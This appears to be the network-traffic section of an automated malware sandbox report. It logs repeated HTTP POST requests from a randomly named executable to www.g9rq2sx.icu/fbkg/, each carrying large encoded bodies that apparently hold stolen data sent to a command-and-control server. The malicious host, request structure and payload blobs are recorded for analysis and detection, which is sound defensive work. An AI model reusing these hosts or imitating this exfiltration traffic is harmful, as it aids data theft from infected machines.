srJ622jwbkmSuQE2b1gPx0IUXNhdSwIP7r+0PwCK1ctVx/LAL5vEn61EOfX9NmybFFpsre47bYdB/y3xck6EbDIvlpcZYeUvwV+xcaBKbdjKFYI+dyga6+kvq+qB4j5vyKkKsCtVFWHskR/5YZyUxM+h9n72WtgDHtYZwuNKJlRercmNf0Z9CbeX5gjUkZFzrmT3ce42F/Io8HVV3IAyaB0sEuMkwpQves6Z8CA8qkiIqnf78Gqlhq2ajlWDf0mFucFbNLhuELOuwehPujD36HNda2nJJ8hGypyFqdENP6ImXQCxrucQmAnI+UVPOX0EGG8TX5Fj6eKFC4fMrGT4HvrAgzGb1KtEtX3BoGj+FTTdYSdJCUYqcM0g3j6akxV36GAs4Jn9Qj/NMiKoxuVC5npnzonu5hZ3SHGV5A1KezYBPKkY+EEOlNUZcZXhV69J1P58qrT9MvL9UfkHkvRcN6HgPwTcNY5x12Wo9SvWrldV1j5dbHA+XaFtL1ksnQWTh0QxoYUBkmFOnwX2189g93ittajlL7RU38Ng9R9kIJvA2q+cMUrH9HOcJ+1o53XGZzzE4/6Tmnzf0x3nCa8kGeiDqhz0KNIYUDWy63/qxqmID/i6/uCXc0wDKvHlOhSQcnVyygpXi/VUatXZz2E+EsJIcejpE9opxwFqdnMhRCNaBIHESLX9cv0hHJK/L7o7miCMNdQrmOjP8Z/wKqNJTdVXGZkyV5bc3hJt1rrQpxoBns3SXovLcM2THjYKWtGQOpRsSI6ETVTp4IB6UF8C7LvMlNbhkQc532j4bzA5TMNwzZF+9OyIvvJKmCJOfKNYhfXOQ/p0khhaGNw+AksUENLD8e4q1JRzwp8DBXBQrpkv8WtizBsyIqV/e+se9bUAqlfS8klf0RoH7DSL0kjNkWJy1I2cNdS6tcCfxClb7G4NhYzhfp+77V
                                                                                                                                                                                                Nov 17, 2023 19:32:26.971451044 CET1441OUTData Raw: 42 38 38 31 7a 59 76 65 47 58 31 79 69 51 30 49 56 37 43 69 47 4f 32 59 48 71 32 44 54 76 55 6b 6a 36 79 6e 35 48 34 70 48 50 51 30 55 59 63 77 4c 66 2b 59 62 42 30 64 46 6f 34 44 58 6d 4a 30 6f 41 6a 6c 6c 32 63 70 65 2f 42 59 4f 38 56 4d 73 58
                                                                                                                                                                                                Data Ascii: B881zYveGX1yiQ0IV7CiGO2YHq2DTvUkj6yn5H4pHPQ0UYcwLf+YbB0dFo4DXmJ0oAjll2cpe/BYO8VMsXR23neGSdlPaLUujfMM/pyWKb45SdFV6JSADhZ6/dnsOGhURb2X+ohlpedmpesvacn2RYulqgfJ9tntevwZGCc2rzJxGXaIXErOBCAFjlmVmJZaE4W/mwoEi3QoycCOGzwYyvSnXlY20vYETLAnujaW5bbs94QFtIx
                                                                                                                                                                                                Nov 17, 2023 19:32:28.096101999 CET1442OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 6a 66 37 48 6e 4d 6d 70 49 6d 53 2f 73 59 46 76 62 6f 59 49 34 36 42 67 4e 72 39 70 77 4e 6b 6f 37 47 46 5a 5a 5a 33 65 55 6b 2f 47 6e 36 31 4a 55 78 76 72 4c 4c 4d 71 39 64 48 58 78 58 68 58 4b 52 6c 44 2b 43 4b 77 4e 54 6a 4a 47 38 73 70 50 52 31 48 72 51 56 56 54 66 5a 75 2b 54 73 71 34 39 63 78 6f 70 6d 52 38 48 48 55 38 33 76 41 79 37 45 68 78 67 72 4d 76 73 33 70 64 71 79 41 76 45 67 31 72 4b 56 37 79 69 59 55 4d 56 31 33 63 51 34 30 33 4d 53 6f 58 54 4c 6d 56 78 32 61 6b 4b 37 6d 53 37 35 68 44 76 50 62 74 6c 4e 31 72 69 33 61 64 59 69 56 57 2b 6d 4e 41 64 56 38 75 43 38 57 4e 66 36 56 68 48 64 53 6b 6b 72 55 39 38 4d 6d 68 4c 6e 48 56 6c 50 4c 59 45 68 79 4a 31 61 69 46 75 69 70 7a 43 43 58 56 33 61 7a 74 48 4e 63 56 79 79 6e 56 54 47 76 64 66 2f 6a 4a 48 50 62 62 36 72 6b 4f 43 48 4c 47 4e 35 42 48 6b 78 68 2b 6f 47 79 67 37 31 32 63 6e 78 4e 49 69 72 58 6d 46 2f 6a 4e 7a 6a 50 56 39 4e 54 67 79 49 58 77 39 2b 45 5a 47 31 39 66 65 59 32 6b 4a 49 4e 6d 41 34 4d 72 63 74 50 67 6c 41 74 62 65 4a 33 75 50 72 45 35 4d 44 4e 2b 77 54 43 75 37 4f 31 4d 4b 78 58 79 43 74 4a 50 78 35 4b 70 49 76 4c 33 38 4d 74 36 4c 4b 33 78 76 72 6c 61 66 6a 6e 72 4c 35 4e 38 55 57 70 34 73 64 70 4d 33 44 74 51 57 34 52 32 6b 33 39 46 6b 62 5a 52 42 42 53 67 52 2b 57 44 33 74 7a 45 4e 5a 55 55 6a 47 53 55 33 58 2b 61 4f 32 38 51 47 70 4c 4f 4e 72 54 77 49 46 47 6d 76 59 4e 74 56 31 6b 53 4a 46 67 6a 78 62 31 71 74 6f 73 51 45 45 5a 43 72 77 6e 36 78 54 56 61 4f 41 4e 58 45 6e 4f 6b 51 42 4a 7a 55 72 61 4d 71 6b 70 44 73 70 55 4c 63 41 46 5a 7a 69 64 58 2b 44 54 62 7a 71 58 5a 66 63 59 6d 55 5a 68 6f 2b 72 4f 74 64 48 6f 73 33 74 46 6b 30 63 58 4d 7a 57 73 69 71 51 2b 6b 30 6e 73 6a 56 7a 75 62 72 5a 44 71 38 34 4b 48 4c 69 6f 4e 32 51 70 66 72 79 54 61 55 56 4f 5a 48 2f 43 4d 57 33 73 37 51 56 65 49 56 38 53 38 4c 5a 72 67 36 52 79 69 38 50 30 74 50 62 73 44 6e 6e 47 45 6c 59 30 71 6d 65 62 7a 53 7a 69 42 38 6d 46 37 68 35 31 73 4f 4f 7a 7a 46 5a 32 68 52 6f 44 57 67 49 32 54 6e 50 58 53 4b 74 64 2b 66 72 58 34 75 51 48 45 69 58 65 33 73 69 72 38 6f 68 59 45 77 6d 6a 41 63 65 6e 2b 66 6f 37 33 71 61 7a 53 52 64 36 74 4b 31 51 70 6e 2f 31 39 4a 61 67 78 74 53 73 67 68 79 4b 2b 72 41 6f 4f 2f 58 71 61 57 74 70 30 2b 74 54 61 2f 76 72 38 78 4e 47 70 71 33 43 2b 6e 38 67 69 42 53 71 4d 47 71 72 58 33 42 38 75 50 73 36 75 76 37 4f 64 59 72 58 59 2b 4c 63 31 65 33 33 75 36 55 63 49 4a 6a 4d 2f 7a 70 43 39 30 74 65
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFjf7HnMmpImS/sYFvboYI46BgNr9pwNko7GFZZZ3eUk/Gn61JUxvrLLMq9dHXxXhXKRlD+CKwNTjJG8spPR1HrQVVTfZu+Tsq49cxopmR8HHU83vAy7EhxgrMvs3pdqyAvEg1rKV7yiYUMV13cQ403MSoXTLmVx2akK7mS75hDvPbtlN1ri3adYiVW+mNAdV8uC8WNf6VhHdSkkrU98MmhLnHVlPLYEhyJ1aiFuipzCCXV3aztHNcVyynVTGvdf/jJHPbb6rkOCHLGN5BHkxh+oGyg712cnxNIirXmF/jNzjPV9NTgyIXw9+EZG19feY2kJINmA4MrctPglAtbeJ3uPrE5MDN+wTCu7O1MKxXyCtJPx5KpIvL38Mt6LK3xvrlafjnrL5N8UWp4sdpM3DtQW4R2k39FkbZRBBSgR+WD3tzENZUUjGSU3X+aO28QGpLONrTwIFGmvYNtV1kSJFgjxb1qtosQEEZCrwn6xTVaOANXEnOkQBJzUraMqkpDspULcAFZzidX+DTbzqXZfcYmUZho+rOtdHos3tFk0cXMzWsiqQ+k0nsjVzubrZDq84KHLioN2QpfryTaUVOZH/CMW3s7QVeIV8S8LZrg6Ryi8P0tPbsDnnGElY0qmebzSziB8mF7h51sOOzzFZ2hRoDWgI2TnPXSKtd+frX4uQHEiXe3sir8ohYEwmjAcen+fo73qazSRd6tK1Qpn/19JagxtSsghyK+rAoO/XqaWtp0+tTa/vr8xNGpq3C+n8giBSqMGqrX3B8uPs6uv7OdYrXY+Lc1e33u6UcIJjM/zpC90te
                                                                                                                                                                                                Nov 17, 2023 19:32:28.471415997 CET1445OUTData Raw: 67 4e 67 4a 72 54 5a 77 71 6e 48 4e 2b 45 73 72 4a 63 2f 6e 61 7a 57 63 52 59 44 6b 39 76 4b 30 5a 6f 79 66 43 66 66 63 42 69 52 4b 31 62 63 4f 2b 47 70 6a 74 71 50 36 37 2f 52 45 36 54 7a 4c 73 45 73 79 54 34 30 38 43 44 4b 39 30 54 6b 6b 48 66
                                                                                                                                                                                                Data Ascii: gNgJrTZwqnHN+EsrJc/nazWcRYDk9vK0ZoyfCffcBiRK1bcO+GpjtqP67/RE6TzLsEsyT408CDK90TkkHf53bJc8s+CWNIdffLA5xf+8GBbYU0igR8579TrQTmbOzHaQx+ykswaUJqfATlNp48AL7GePxcrd0MPxLNJdbCx3Ct7ZU4P9z8bB+xsBIqJ+YOKgUo9Rr0m/IJeaPRu4zjr5fCLDlwhFzJ0iYJ1sodllAv3jGTD0u+K
                                                                                                                                                                                                Nov 17, 2023 19:32:28.845421076 CET1446OUTData Raw: 6a 38 6f 41 43 5a 6b 56 6a 67 5a 41 79 4a 69 49 62 46 5a 6c 58 4c 58 4f 30 66 53 77 48 50 36 38 4a 58 43 43 56 44 52 66 62 67 62 75 6b 6a 57 67 41 65 39 62 4c 61 4b 54 59 43 63 53 43 45 70 79 37 79 30 52 2f 30 32 54 37 34 61 63 42 79 71 39 6d 79
                                                                                                                                                                                                Data Ascii: j8oACZkVjgZAyJiIbFZlXLXO0fSwHP68JXCCVDRfbgbukjWgAe9bLaKTYCcSCEpy7y0R/02T74acByq9myxv3YMtLH7eDr5JEQLP196c1UOPRWXpq8fMWaX8Oj3Q3jLsZ9w/fkUi5i7tAyCy1tmSQlVmg35pwUZM3o2o1nw9g6WfLzIw7EGV9fEMgReQa06xU0OT7HTl3lMxhSASdxw9XrUntRsH4dWsFzW3ivLG0qj8gyqHsA0
                                                                                                                                                                                                Nov 17, 2023 19:32:29.209249973 CET1451OUTData Raw: 66 55 59 56 47 33 33 6f 6c 39 46 4c 36 77 73 62 72 64 54 75 55 34 52 46 68 53 63 73 56 65 59 64 71 55 77 30 76 7a 52 51 6b 33 43 6a 4a 6a 67 7a 4e 4c 6f 6f 34 36 64 4a 56 58 31 6f 51 70 79 4b 4c 52 2f 59 49 66 45 69 37 63 6c 46 37 79 31 45 51 30
                                                                                                                                                                                                Data Ascii: fUYVG33ol9FL6wsbrdTuU4RFhScsVeYdqUw0vzRQk3CjJjgzNLoo46dJVX1oQpyKLR/YIfEi7clF7y1EQ0U/d3x/uq781cwxq/PEQQIAgylYbS9JC4Rc9eQh/NqftjnnVYY8DN/sKjDGzaGTH3yhqv4LkSX37MMb6z7ePdwFFg589RCgtRznbjnTp0kni64oAAmi20Xw8PkZABKyqkaJJh7hQQrcQgWxqweFzcIWXVRIv1b62Ch
                                                                                                                                                                                                Nov 17, 2023 19:32:29.209424019 CET1456OUTData Raw: 33 78 41 6e 54 64 49 50 4e 7a 56 38 4d 59 45 73 75 59 68 37 68 51 57 75 76 31 51 41 61 64 41 6f 44 62 6a 44 55 44 78 7a 4d 4e 58 51 59 50 61 66 6e 30 69 46 53 4e 6a 34 44 4b 2b 4a 6b 77 47 2b 4e 79 65 69 48 7a 52 48 6b 4a 42 44 48 70 50 66 44 69
                                                                                                                                                                                                Data Ascii: 3xAnTdIPNzV8MYEsuYh7hQWuv1QAadAoDbjDUDxzMNXQYPafn0iFSNj4DK+JkwG+NyeiHzRHkJBDHpPfDi8vnnzmCxzVDZsJ9YwApGxm5LAq1si36hFP0RSWsOfAUkYIvsuBbM0rXH2poQmY+dkrAoEb4i/aFwP4XYbsNJpXr//lfLNVzQKXC156E/rLuhWlWEN7sD1H3r9KfaBicZR8P2WdX8d0pKZ6L2ibPP1c9ELCMLNqr/l
                                                                                                                                                                                                Nov 17, 2023 19:32:29.586930990 CET1458OUTData Raw: 31 42 45 44 6a 49 45 63 50 35 70 76 35 72 71 79 52 2b 62 5a 55 6f 41 38 6a 65 38 77 6b 39 5a 49 36 39 65 37 4f 55 35 68 6d 33 4c 46 34 2f 79 46 46 31 34 45 4f 38 45 79 66 4e 42 4e 31 50 72 73 62 39 75 79 48 57 75 76 53 6b 37 4d 56 51 37 70 32 6a
                                                                                                                                                                                                Data Ascii: 1BEDjIEcP5pv5rqyR+bZUoA8je8wk9ZI69e7OU5hm3LF4/yFF14EO8EyfNBN1Prsb9uyHWuvSk7MVQ7p2jLKKFucBF3a05UlZFjrKhQsQ/aP/T8W5G+pExxUboM40hLG0p42ZaRkUP8IevsJ00Eq2rwjK3DFKSU2U6wzw0CKAo7nLwEmsxdtAymijmQk/uiey+tjW+zNgbs/GiCI3RRu4Eu/qO8KaqthrwNyDyvAOnP8v1eve2N
                                                                                                                                                                                                Nov 17, 2023 19:32:30.517549992 CET1459OUTData Raw: 33 4b 46 7a 31 70 6d 55 2f 34 37 6a 62 4a 55 6e 70 76 54 4e 56 66 68 34 79 36 32 34 44 39 55 42 41 71 36 43 44 47 6c 64 4d 6c 30 44 74 6a 2f 76 63 71 2b 53 42 39 4e 39 46 46 74 47 56 53 6f 66 52 6e 72 4b 4f 55 34 63 53 41 69 34 76 4b 47 63 47 6d
                                                                                                                                                                                                Data Ascii: 3KFz1pmU/47jbJUnpvTNVfh4y624D9UBAq6CDGldMl0Dtj/vcq+SB9N9FFtGVSofRnrKOU4cSAi4vKGcGm6b8UZ9CPNX/e5xfDMo2xpYLK6nCEHJVMWTAjIHoiL1/bLhGhMuaNILJlTkiMrWFEFTtBBiGijBtk5CzIVOaT+ItVIxepQ8VpOARIlYiEoiVBsI1m8R8GPRF4SkVtwyVPohWjyZ40hg7VAzbdRffZZ8LRrOk42IZVN
                                                                                                                                                                                                Nov 17, 2023 19:32:30.897147894 CET1462OUTData Raw: 4a 44 53 42 55 45 2f 31 61 6c 5a 48 47 48 74 32 38 32 77 30 4d 32 6d 4b 76 62 4b 30 38 6f 35 49 62 34 62 44 34 34 7a 73 6a 2f 6f 39 2b 68 70 45 78 2b 78 4b 76 4e 34 30 45 36 33 4e 45 57 38 4a 33 44 4b 73 64 61 59 4e 73 70 66 44 49 6e 6c 54 6b 4d
                                                                                                                                                                                                Data Ascii: JDSBUE/1alZHGHt282w0M2mKvbK08o5Ib4bD44zsj/o9+hpEx+xKvN40E63NEW8J3DKsdaYNspfDInlTkMMM+M00DGa8K0qjfVSd6FojDj33UX+K/po0GJy5Jbt4JV01RMDqdeoQ2SBrGPTFrznP2YnN4nub7YZv6vUjZeKAtE+i8uRS6Q6AaUlT40IxndgFvCXOH2XtPZfOKMju8grTji2/o5zbI3lth1WnMLXrUD39xoUCe6a
                                                                                                                                                                                                Nov 17, 2023 19:32:30.897322893 CET1465OUTData Raw: 2f 61 2f 47 50 4a 41 65 2f 48 69 66 44 78 46 65 73 55 47 53 41 42 43 66 74 54 54 33 6a 49 50 76 42 35 69 33 77 70 68 6a 5a 6e 36 76 48 46 4c 46 6a 4d 76 39 43 44 50 6f 54 4b 77 57 56 6a 31 44 31 65 54 48 62 77 78 6f 46 7a 31 54 69 37 4a 33 6a 64
                                                                                                                                                                                                Data Ascii: /a/GPJAe/HifDxFesUGSABCftTT3jIPvB5i3wphjZn6vHFLFjMv9CDPoTKwWVj1D1eTHbwxoFz1Ti7J3jdQIYlkGreulCPBu5MEQ9LkDnmQQyEUznzWDAR6K6spcPI/OzE3m86y9z0ySmh8AS5eBzyjy6r1iHUMj4qGR6zlC5zYe3qHMuDELQX85mbIZRDNrB/jYr4oJHuYtFH5LISg1oNPijKI1rCIYYBwZZbJP05ZaJKxWXNO
                                                                                                                                                                                                Nov 17, 2023 19:32:33.688695908 CET1467OUTData Raw: 4a 44 53 42 55 45 2f 31 61 6c 5a 48 47 48 74 32 38 32 77 30 4d 32 6d 4b 76 62 4b 30 38 6f 35 49 62 34 62 44 34 34 7a 73 6a 2f 6f 39 2b 68 70 45 78 2b 78 4b 76 4e 34 30 45 36 33 4e 45 57 38 4a 33 44 4b 73 64 61 59 4e 73 70 66 44 49 6e 6c 54 6b 4d
                                                                                                                                                                                                Data Ascii: JDSBUE/1alZHGHt282w0M2mKvbK08o5Ib4bD44zsj/o9+hpEx+xKvN40E63NEW8J3DKsdaYNspfDInlTkMMM+M00DGa8K0qjfVSd6FojDj33UX+K/po0GJy5Jbt4JV01RMDqdeoQ2SBrGPTFrznP2YnN4nub7YZv6vUjZeKAtE+i8uRS6Q6AaUlT40IxndgFvCXOH2XtPZfOKMju8grTji2/o5zbI3lth1WnMLXrUD39xoUCe6a


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                7438.163.97.880192.168.11.2050201C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:26.227411032 CET1438OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 6a 66 37 48 6e 4d 6d 70 49 6d 53 2f 73 59 46 76 62 6f 59 49 34 36 42 67 4e 72 39 70 77 4e 6b 6f 37 47 46 5a 5a 5a 33 65 55 6b 2f 47 6e 36 31 4a 55 78 76 72 4c 4c 4d 71 39 64 48 58 78 58 68 58 4b 52 6c 44 2b 43 4b 77 4e 54 6a 4a 47 38 73 70 50 52 31 48 72 51 56 56 54 66 5a 75 2b 54 73 71 34 39 63 78 6f 70 6d 52 38 48 48 55 38 33 76 41 79 37 45 68 78 67 72 4d 76 73 33 70 64 71 79 41 76 45 67 31 72 4b 56 37 79 69 59 55 4d 56 31 33 63 51 34 30 33 4d 53 6f 58 54 4c 6d 56 78 32 61 6b 4b 37 6d 53 37 35 68 44 76 50 62 74 6c 4e 31 72 69 33 61 64 59 69 56 57 2b 6d 4e 41 64 56 38 75 43 38 57 4e 66 36 56 68 48 64 53 6b 6b 72 55 39 38 4d 6d 68 4c 6e 48 56 6c 50 4c 59 45 68 79 4a 31 61 69 46 75 69 70 7a 43 43 58 56 33 61 7a 74 48 4e 63 56 79 79 6e 56 54 47 76 64 66 2f 6a 4a 48 50 62 62 36 72 6b 4f 43 48 4c 47 4e 35 42 48 6b 78 68 2b 6f 47 79 67 37 31 32 63 6e 78 4e 49 69 72 58 6d 46 2f 6a 4e 7a 6a 50 56 39 4e 54 67 79 49 58 77 39 2b 45 5a 47 31 39 66 65 59 32 6b 4a 49 4e 6d 41 34 4d 72 63 74 50 67 6c 41 74 62 65 4a 33 75 50 72 45 35 4d 44 4e 2b 77 54 43 75 37 4f 31 4d 4b 78 58 79 43 74 4a 50 78 35 4b 70 49 76 4c 33 38 4d 74 36 4c 4b 33 78 76 72 6c 61 66 6a 6e 72 4c 35 4e 38 55 57 70 34 73 64 70 4d 33 44 74 51 57 34 52 32 6b 33 39 46 6b 62 5a 52 42 42 53 67 52 2b 57 44 33 74 7a 45 4e 5a 55 55 6a 47 53 55 33 58 2b 61 4f 32 38 51 47 70 4c 4f 4e 72 54 77 49 46 47 6d 76 59 4e 74 56 31 6b 53 4a 46 67 6a 78 62 31 71 74 6f 73 51 45 45 5a 43 72 77 6e 36 78 54 56 61 4f 41 4e 58 45 6e 4f 6b 51 42 4a 7a 55 72 61 4d 71 6b 70 44 73 70 55 4c 63 41 46 5a 7a 69 64 58 2b 44 54 62 7a 71 58 5a 66 63 59 6d 55 5a 68 6f 2b 72 4f 74 64 48 6f 73 33 74 46 6b 30 63 58 4d 7a 57 73 69 71 51 2b 6b 30 6e 73 6a 56 7a 75 62 72 5a 44 71 38 34 4b 48 4c 69 6f 4e 32 51 70 66 72 79 54 61 55 56 4f 5a 48 2f 43 4d 57 33 73 37 51 56 65 49 56 38 53 38 4c 5a 72 67 36 52 79 69 38 50 30 74 50 62 73 44 6e 6e 47 45 6c 59 30 71 6d 65 62 7a 53 7a 69 42 38 6d 46 37 68 35 31 73 4f 4f 7a 7a 46 5a 32 68 52 6f 44 57 67 49 32 54 6e 50 58 53 4b 74 64 2b 66 72 58 34 75 51 48 45 69 58 65 33 73 69 72 38 6f 68 59 45 77 6d 6a 41 63 65 6e 2b 66 6f 37 33 71 61 7a 53 52 64 36 74 4b 31 51 70 6e 2f 31 39 4a 61 67 78 74 53 73 67 68 79 4b 2b 72 41 6f 4f 2f 58 71 61 57 74 70 30 2b 74 54 61 2f 76 72 38 78 4e 47 70 71 33 43 2b 6e 38 67 69 42 53 71 4d 47 71 72 58 33 42 38 75 50 73 36 75 76 37 4f 64 59 72 58 59 2b 4c 63 31 65 33 33 75 36 55 63 49 4a 6a 4d 2f 7a 70 43 39 30 74 65 6a 38 6f 41 43 5a 6b 56 6a 67 5a 41 79 4a 69 49 62 46 5a 6c 58 4c 58 4f 30 66 53 77 48 50 36 38 4a 58 43 43 56 44 52 66 62 67 62 75 6b 6a 57 67 41 65 39 62 4c 61 4b 54 59 43 63 53 43 45 70 79 37 79 30 52 2f 30 32 54 37 34 61 63 42 79 71 39 6d 79 78 76 33 59 4d 74 4c 48 37 65 44 72 35 4a 45 51 4c 50 31 39 36 63 31 55 4f 50 52 57 58 70 71 38 66 4d 57 61 58 38 4f 6a 33 51 33 6a 4c 73 5a 39 77 2f 66 6b 55 69 35 69 37 74 41 79 43 79 31 74 6d 53 51 6c 56 6d 67 33 35 70 77 55 5a 4d 33 6f 32 6f 31 6e 77 39 67 36 57 66 4c 7a 49 77 37 45 47 56 39 66 45 4d 67 52 65 51 61 30 36 78 55 30 4f 54 37 48 54 6c 33 6c 4d 78 68 53 41 53 64 78 77 39 58 72 55 6e 74 52 73 48 34 64 57 73 46 7a 57 33 69 76 4c 47 30 71 6a 38 67 79 71 48 73 41 30 48 6e 70 6e 4c 77 66 5a 34 65 76 38 4f 65 74 43 63 4e 47 6d 33 6a 45 37 36 59 55 46 50 43 6d 4b 66 2b 34 34 51 78 41 52 6e 6b 68 6a 59 41 46 48 39 6b 2f 31 63 61 39 43 61 79 67 55 4e 79 64 71 38 45 54 6b 37 47 55 79 57 47 4b 71 51 6b 61 68 4a 66 43 35 50 4b 4e 42 52 74 32 69 49 7a 52 4b 6b 76 5a 41 78 68 4c 6f 50 52 47 76 47 61 4b 74 6b 37 45 6c 6b 43 73 36 71 7a 4b 30 45 53 71 41 75 6a 5a 41 68 75 57 47 6d 64 42 6d 75 79 59 52 42 62 70 6d 79 38 5a 65 65 71 2b 65 58 56 72 59 37 66 32 62 2f 41 50 77 77 62 68 6a 72 59 71 75 34 33 4b 6f 67 70 49 55 44 35 42 65 61 4b 74 37 52 42 44 2b 66 58 75 62 4e 76 46 46 42 33 6b 65 39 53 72 59 38 37 48 46 75 69 75 42 78 46 6e 56 47 4a 36 44 57 37 6d 32 67 4b 76 58 50 54 4b 46 65 44 65 43 65 6d 63 4e 6c 54 38 74 56 66 30 58 53 72 6e 2f 70 57
                                                                                                                                                                                                Data Ascii: T6I=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